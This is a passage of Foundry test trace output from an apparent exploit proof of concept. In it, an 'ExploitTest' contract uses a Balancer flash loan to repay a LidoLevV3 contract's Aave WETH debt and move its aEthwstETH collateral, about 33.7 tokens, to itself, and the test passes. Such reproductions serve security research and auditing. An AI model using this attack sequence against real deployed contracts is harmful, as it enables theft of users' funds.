    │   │   │   │   │   │   │   │   @ 58: 0x000000000000000000000000000000000000000000005fe897aa24c32ea04b0b → 0x000000000000000000000000000000000000000000005fe6c256c9d32c015322
    │   │   │   │   │   │   │   │   @ 0xc5a4446417df74ed5e0566b54b80821d4e335b6f7312c39070cee6a5bd20d520: 0x00000000035826ff2489bafa33adf90f0000000000000001d5535af0029ef7e9 → 0x00000000035826ff2489bafa33adf90f00000000000000000000000000000000
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000005fe6c256c9d32c015322
    │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000005fe6c256c9d32c015322
    │   │   │   │   │   ├─ [5160] 0x06B1Ec378618EA736a65395eA5CAB69A2410493B::calculateInterestRates((0, 35002954502486078893 [3.5e19], 0, 0, 468743592768014871366825 [4.687e23], 0, 1500, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x4d5F47FA6A74757f35C14fD3a6Ef8E3C9BC514E8)) [staticcall]
    │   │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x4d5F47FA6A74757f35C14fD3a6Ef8E3C9BC514E8) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 143328227390135769224983 [1.433e23]
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000cd3e87f7cafba07662bc50000000000000000000000000000000000000000004c212ab69fa50ee80243e600000000000000000000000000000000000000000013b5084a0a0d0de69b2f88
    │   │   │   │   │   ├─ emit ReserveDataUpdated(param0: 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, param1: 15507817994296699304422341 [1.55e25], param2: 92034988307315731011355622 [9.203e25], param3: 23824491815121011707948936 [2.382e25], param4: 1019369531491344843689208548 [1.019e27], param5: 1035024658069051456948664591 [1.035e27])
    │   │   │   │   │   ├─ [3425] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transferFrom(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], 0x4d5F47FA6A74757f35C14fD3a6Ef8E3C9BC514E8, 35002954502486078893 [3.5e19])
    │   │   │   │   │   │   ├─ emit Transfer(from: LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], to: 0x4d5F47FA6A74757f35C14fD3a6Ef8E3C9BC514E8, value: 35002954502486078893 [3.5e19])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x72abcc8c1956d2c5aceb3e4a4a26c855bc628660ed76bd1c9129d9ab812d24ea: 0x000000000000000000000000000000000000000000000001ef7645888220a84f → 0x00000000000000000000000000000000000000000000000009b2cbdde848f2a2
    │   │   │   │   │   │   │   @ 0xb064600732a82908427d092d333e607598a6238a59aeb45e1288cb0bac7161cf: 0x000000000000000000000000000000000000000000001e59d6ba01d57f73d717 → 0x000000000000000000000000000000000000000000001e5bbc7d7b80194b8cc4
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [1136] 0x4d5F47FA6A74757f35C14fD3a6Ef8E3C9BC514E8::handleRepayment(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], 35002954502486078893 [3.5e19])
    │   │   │   │   │   │   ├─ [578] 0x7EfFD7b47Bfd17e52fB7559d3f924201b9DbfF3d::handleRepayment(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], 35002954502486078893 [3.5e19]) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   └─ ← [Return]
    │   │   │   │   │   ├─ emit Repay(param0: 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, param1: LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], param2: LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], param3: 35002954502486078893 [3.5e19], param4: false)
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xf81d8d79f42adb4c73cc3aa0c78e25d3343882d0313c0b80ece3d3a103ef1ec1: 0x000000000013b568bb97eaae1823947200000000035826ff2489bafa33adf90f → 0x000000000013b5084a0a0d0de69b2f8800000000035826ff2489bafa33adf90f
    │   │   │   │   │   │   @ 0xf81d8d79f42adb4c73cc3aa0c78e25d3343882d0313c0b80ece3d3a103ef1ec0: 0x00000000000cd4660e7e92740cb1f08c00000000034b33e507c9c2422a5caae4 → 0x00000000000cd3e87f7cafba07662bc500000000034b33e507c9c2422a5caae4
    │   │   │   │   │   │   @ 0xf81d8d79f42adb4c73cc3aa0c78e25d3343882d0313c0b80ece3d3a103ef1ec2: 0x00000000000000000000000065bb6f7700000000004c21b47d6a4f6177e9af7e → 0x00000000000000000000000065bb6f7700000000004c212ab69fa50ee80243e6
    │   │   │   │   │   │   @ 0x82b974bece31f54dd185455479045bf3d5fe6f936188dd73e07668d61e052f29: 9 → 8
    │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000001e5c379aa99d7b5ad
    │   │   │   │   └─ ← [Return] 35002954502486078893 [3.5e19]
    │   │   │   └─ ← [Return] 35002954502486078893 [3.5e19]
    │   │   ├─ [3082] aEthwstETH::balanceOf(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142]) [staticcall]
    │   │   │   ├─ [2530] 0x7EfFD7b47Bfd17e52fB7559d3f924201b9DbfF3d::balanceOf(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142]) [delegatecall]
    │   │   │   │   ├─ [1356] 0x87870Bca3F3fD6335C3F4ce8392D69350B4fA4E2::getReserveNormalizedIncome(0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0) [staticcall]
    │   │   │   │   │   ├─ [804] 0x5FAab9E1adbddaD0a08734BE8a52185Fd6558E14::getReserveNormalizedIncome(0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000033b9de7e3d39a6f9a7c08df
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000033b9de7e3d39a6f9a7c08df
    │   │   │   │   └─ ← [Return] 33698806193381635860 [3.369e19]
    │   │   │   └─ ← [Return] 33698806193381635860 [3.369e19]
    │   │   ├─ [68076] aEthwstETH::transfer(ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 33698806193381635860 [3.369e19])
    │   │   │   ├─ [67521] 0x7EfFD7b47Bfd17e52fB7559d3f924201b9DbfF3d::transfer(ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 33698806193381635860 [3.369e19]) [delegatecall]
    │   │   │   │   ├─ [1356] 0x87870Bca3F3fD6335C3F4ce8392D69350B4fA4E2::getReserveNormalizedIncome(0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0) [staticcall]
    │   │   │   │   │   ├─ [804] 0x5FAab9E1adbddaD0a08734BE8a52185Fd6558E14::getReserveNormalizedIncome(0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000033b9de7e3d39a6f9a7c08df
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000033b9de7e3d39a6f9a7c08df
    │   │   │   │   ├─ [1201] 0x8164Cc65827dcFe994AB23944CBC90e0aa80bFcb::handleAction(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], 840277344194556828894021 [8.402e23], 33681044764761642582 [3.368e19])
    │   │   │   │   │   ├─ [675] 0xE7B67F44eA304DD7f6d215b13686637ff64CD2B2::handleAction(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], 840277344194556828894021 [8.402e23], 33681044764761642582 [3.368e19]) [delegatecall]
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   └─ ← [Return]
    │   │   │   │   ├─ [1201] 0x8164Cc65827dcFe994AB23944CBC90e0aa80bFcb::handleAction(ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 840277344194556828894021 [8.402e23], 0)
    │   │   │   │   │   ├─ [675] 0xE7B67F44eA304DD7f6d215b13686637ff64CD2B2::handleAction(ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 840277344194556828894021 [8.402e23], 0) [delegatecall]
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   └─ ← [Return]
    │   │   │   │   ├─ emit Transfer(from: LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], to: ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 33698806193381635860 [3.369e19])
    │   │   │   │   ├─ [33031] 0x87870Bca3F3fD6335C3F4ce8392D69350B4fA4E2::finalizeTransfer(0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0, LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 33698806193381635860 [3.369e19], 33698806193381635860 [3.369e19], 0)
    │   │   │   │   │   ├─ [32455] 0x5FAab9E1adbddaD0a08734BE8a52185Fd6558E14::finalizeTransfer(0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0, LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 33698806193381635860 [3.369e19], 33698806193381635860 [3.369e19], 0) [delegatecall]
    │   │   │   │   │   │   ├─ [402] 0x2f39d218133AFaB8F2B819B1066c7E434Ad94E9e::getPriceOracle() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x54586bE62E3c3580375aE3723C145253060Ca0C2
    │   │   │   │   │   │   ├─ [29145] 0x589F82Ff8162Fa96545b435435713E9D6ca79fBB::8a5dadd1(00000000000000000000000000000000000000000000000000000000000000340000000000000000000000000000000000000000000000000000000000000036000000000000000000000000000000000000000000000000000000000000003700000000000000000000000000000000000000000000000000000000000000350000000000000000000000007f39c581f595b53c5cb19bd0b3f8da6c935e2ca0000000000000000000000000cd6ca2f0d0c182c5049d9a1f65cde51a706ae1420000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000001d3aa35b05f3ef714000000000000000000000000000000000000000000000001d3aa35b05f3ef7140000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001b00000000000000000000000054586be62e3c3580375ae3723c145253060ca0c20000000000000000000000000000000000000000000000000000000000000001) [delegatecall]
    │   │   │   │   │   │   │   ├─ emit ReserveUsedAsCollateralDisabled(param0: 0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0, param1: LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142])
    │   │   │   │   │   │   │   ├─ emit ReserveUsedAsCollateralEnabled(param0: 0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0, param1: ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x82b974bece31f54dd185455479045bf3d5fe6f936188dd73e07668d61e052f29: 8 → 0
    │   │   │   │   │   │   │   │   @ 0x3c3f303012a85fd86f559fc2d8edcdaeca23134600f1d3d56b5813432ad58ecf: 0 → 8
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   └─ ← [Return]
    │   │   │   │   ├─ emit BalanceTransfer(param0: LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], param1: ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 33681044764761642582 [3.368e19], param3: 1000527341973624759506438367 [1e27])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xa177ad5b1609a4e783625b46e3ee407279131ff23903962d9c5ce8a1440867a5: 0 → 0x00000000033b9de7e3d39a6f9a7c08df0000000000000001d36b1bc383a5d656
    │   │   │   │   │   @ 0xdeae47ff7bd01bad86820ae7179c8488fb5c841f1c7f147b7555c5347615fc5c: 0x00000000033b9de7e3d39a6f9a7c08df0000000000000001d36b1bc383a5d656 → 0x00000000033b9de7e3d39a6f9a7c08df00000000000000000000000000000000
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─ [424] ExploitTest::createAaveDebt(35002954502486078893 [3.5e19])
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], 0)
    │   │   │   ├─ emit Transfer(from: LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], to: Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], value: 0)
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Stop]
    │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8]) [staticcall]
    │   │   └─ ← [Return] 55912009748616849239618 [5.591e22]
    │   ├─ emit FlashLoan(param0: LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], param1: 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, param2: 0, param3: 0)
    │   └─ ← [Stop]
    ├─ [3082] aEthwstETH::balanceOf(ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [2530] 0x7EfFD7b47Bfd17e52fB7559d3f924201b9DbfF3d::balanceOf(ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   ├─ [1356] 0x87870Bca3F3fD6335C3F4ce8392D69350B4fA4E2::getReserveNormalizedIncome(0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0) [staticcall]
    │   │   │   ├─ [804] 0x5FAab9E1adbddaD0a08734BE8a52185Fd6558E14::getReserveNormalizedIncome(0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0) [delegatecall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000033b9de7e3d39a6f9a7c08df
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000033b9de7e3d39a6f9a7c08df
    │   │   └─ ← [Return] 33698806193381635860 [3.369e19]
    │   └─ ← [Return] 33698806193381635860 [3.369e19]
    ├─ [874] aEthwstETH::decimals() [staticcall]
    │   ├─ [357] 0x7EfFD7b47Bfd17e52fB7559d3f924201b9DbfF3d::decimals() [delegatecall]
    │   │   └─ ← [Return] 18
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Exploiter aEthwstETH balance after attack", val: 33698806193381635860 [3.369e19], decimals: 18)
    ├─  storage changes:
    │   @ 0: 2 → 1
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 32.92s (31.51s CPU time)

Ran 2 test suites in 33.79s (33.56s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
